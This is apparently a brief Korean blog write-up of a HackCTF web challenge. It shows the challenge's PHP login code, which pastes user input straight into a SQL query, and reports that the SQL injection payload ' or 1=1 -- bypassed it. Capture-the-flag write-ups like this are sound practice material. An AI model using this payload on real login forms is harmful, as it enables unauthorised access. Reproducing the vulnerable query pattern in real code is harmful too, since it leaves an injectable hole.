링크에 접속하면 로그인 화면이 하나 나온다
View Source를 눌러 소스를 봤다
<?php
highlight_FILE(__FILE__);
require_once("dbcon.php");
$id = $_GET['id'];
$pw = $_GET['pw'];
$pw = hash('sha256',$pw);
$sql = "select * from jhyeonuser where binary id='$id' and pw='$pw'";
$result = mysqli_fetch_array(mysqli_query($db,$sql));
if($result['id']){
$_SESSION['id'] = $result['id'];
mysqli_close($db);
header("Location:welcome.php");
}
?>
단순 sql 문제
' or 1=1 -- 를 쓰니까 풀렸다
'HackCTF > web' 카테고리의 다른 글
| HackCTF - Time (0) | 2021.07.10 |
|---|---|
| HackCTF - 마법봉 (0) | 2021.07.09 |
| HackCTF - Read File (0) | 2021.07.09 |
| HackCTF - Guess me (0) | 2021.07.09 |
| HackCTF - 보물 (0) | 2021.07.08 |
